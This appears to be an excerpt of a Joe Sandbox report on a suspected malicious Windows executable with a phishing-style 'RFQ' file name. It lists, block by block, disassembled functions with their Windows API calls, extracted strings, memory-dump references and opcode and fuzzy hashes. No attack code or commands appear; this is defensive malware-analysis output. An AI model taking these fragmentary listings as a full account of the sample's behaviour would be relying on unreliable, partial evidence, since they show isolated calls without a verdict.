                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • _wcscat.LIBCMT ref: 00444CB7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FullNamePath_memmove_wcscat
                                                                                • String ID: SL
                                                                                • API String ID: 257928180-181245872
                                                                                • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 372448540-1403004172
                                                                                • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __fread_nolock_memmove
                                                                                • String ID: EA06
                                                                                • API String ID: 1988441806-3962188686
                                                                                • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                                • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                                • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 372448540-1403004172
                                                                                • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 372448540-1403004172
                                                                                • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                  • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                  • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                  • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Init$ClearCopy_memmove
                                                                                • String ID: d}K
                                                                                • API String ID: 2932060187-3405784397
                                                                                • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                APIs
                                                                                  • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                  • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 3158253471-631824599
                                                                                • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9